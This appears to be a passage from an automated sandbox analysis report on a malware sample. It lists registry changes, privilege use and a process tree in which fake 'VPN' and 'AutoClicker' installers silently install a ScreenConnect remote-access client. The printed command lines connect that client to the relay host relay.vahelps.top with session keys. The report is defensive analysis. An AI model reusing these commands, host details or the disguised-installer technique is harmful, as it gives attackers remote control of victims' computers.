| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\594E83E3B144E17B918A56C8188C0B21 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\066BF637963EA270D7C47FABD896ABE4\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\e9736d81e38965d1\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e9736d81e38965d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (e9736d81e38965d1)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO\\ie_to_edge_bho_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\TypeLib\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1505343591-821288467-4101320450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e9736d81e38965d1\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationName = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.xml\OpenWithProgids | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0D32-6986436855F3} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell\open | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\594E83E3B144E17B918A56C8188C0B21\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\e9736d81e38965d1\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\670477F90DC6EA60B24E65EDB2E83A5E\PackageCode = "670477F90DC6EA60B24E65EDB2E83A5E" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e9736d81e38965d1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\VersionIndependentProgID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\DisplayName = "PDF Preview Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\ = "TypeLib for Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\TypeLib\ = "{2397ECFE-3237-400F-AE51-62B25B3F15B5}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\elevation_service.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\Programmable\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\DefaultIcon\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzU4MjhDNUUtMDUxOS00MTE5LUFDMzItMEQwMjhCMDJCMjUwfSIgdXNlcmlkPSJ7N0I0QUNERUYtMzE3My00REU0LTg5MDUtNERGQTAyQjNBNDUwfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RERBRUExMjItNkZCQi00QzhDLTgxMkYtMzNFRDkzMkRGNzJEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4Mzk2NiIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjQwMTY2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUwNDc2OTcwNjEiLz48L2FwcD48L3JlcXVlc3Q-
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 744EA09B7BA7B5D76F054C87DCC8941F C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241272359 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DA876DEF3671D31DDC65F679980BD4AA
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3B1B9C597AEA9010FCAF39907D2E9063 E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&t=FREE_VPN"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "12337850-2b3d-4843-a4e9-32eb8a58f012" "User"
C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 89B8F36B5097067F3BBED7A68D7C8476 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIE713.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241297203 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5D41985BF1B96B1414A5AB28F558D6FC
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 00E078E3CA27A03288DE8EC44A19694A E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=AUTOCLICKER"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "74267e91-e11f-4f86-a437-bf8e66deae5a" "User"
C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 58C4699C69D4AA893D4A4F40DCBA4615 C
